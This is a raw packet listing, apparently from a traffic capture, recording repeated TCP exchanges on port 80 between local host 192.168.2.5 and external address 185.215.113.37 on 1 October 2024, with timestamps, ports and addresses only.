Oct 1, 2024 19:32:12.598155022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598164082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598170996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598175049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598177910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598202944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598220110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598287106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598298073 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598309040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598320007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598325014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598330975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598341942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598347902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598352909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598368883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598370075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598380089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598387003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598392010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598404884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598404884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598422050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598428965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598447084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598455906 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598465919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598478079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598489046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598490953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598500013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598519087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598536015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598536968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598548889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598558903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598570108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598577023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598581076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598583937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598604918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598622084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598633051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598634958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598656893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598659992 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598683119 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598694086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598723888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598735094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598745108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598761082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598774910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598783016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598787069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598788977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598798037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598815918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598824978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598834991 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598850012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598860979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598870993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598890066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598901033 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.598944902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598954916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598965883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598978043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.598982096 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.599005938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.599030018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.683758974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.683774948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.683784962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.683842897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.683875084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.683943033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.683959007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.683969975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.683979034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.683983088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.683989048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684000969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684001923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684012890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684019089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684025049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684035063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684043884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684046030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684057951 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684062958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684072018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684075117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684084892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684097052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684097052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684111118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684118986 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684122086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684133053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684140921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684144974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684156895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684166908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684190989 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684212923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684228897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684240103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684251070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684252024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684262037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684273005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684276104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684283972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684294939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684303999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684304953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684310913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684315920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684326887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684338093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684340000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684365034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684365034 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684376955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684380054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684403896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684405088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684415102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684418917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684438944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684452057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684565067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684576035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684585094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684596062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684601068 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684606075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684613943 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684617996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684642076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684655905 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684693098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684703112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684712887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684726954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684731960 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684737921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684746027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684750080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684760094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684772015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684772015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684782028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684789896 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684799910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684807062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684809923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684820890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684834003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684848070 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684854984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684864998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684871912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684876919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.684890032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684902906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.684920073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685065985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685075998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685091972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685102940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685102940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685113907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685117960 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685125113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685129881 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685136080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685147047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685158014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685163021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685168982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685179949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685182095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685192108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685204029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685209990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685220957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685226917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685233116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685244083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685245991 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685256004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685265064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685269117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685276985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685286045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685295105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685297012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685307026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685307980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685326099 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685349941 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685353041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685364008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685380936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685391903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685391903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685403109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685412884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685416937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685424089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685435057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685445070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685447931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685456038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685456991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685468912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685475111 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685483932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685497999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685517073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685518026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685528994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685534954 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685539961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685550928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685551882 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685568094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685586929 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685601950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685612917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685622931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685632944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685640097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685643911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685663939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685687065 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685709953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685720921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685734034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685750961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685759068 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685759068 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685762882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685775995 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685782909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685791969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685792923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685800076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685803890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685818911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685832024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685837984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685843945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685848951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685859919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685869932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685874939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685883045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685894012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685903072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685906887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685916901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685935020 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685960054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.685971022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685981989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.685992002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.686009884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.686023951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.686033010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.686037064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.686057091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.686060905 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.686067104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.686077118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.686084986 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.686101913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.686122894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.770838976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.770927906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.770986080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.770996094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771006107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771014929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771025896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771032095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.771054029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.771110058 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.771173000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771183968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771192074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771203041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771214008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771219969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.771224022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771234035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771238089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.771245003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771255970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771266937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.771295071 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.771323919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771338940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771347046 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771358013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771365881 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.771374941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771390915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771399975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.771401882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771413088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771421909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771425962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.771430969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771440983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771450043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771456003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.771461010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771461010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.771471977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771481991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771492958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771495104 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.771503925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771509886 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.771516085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.771536112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.771547079 CEST	80	49704	185.215.113.37	192.168.2.5
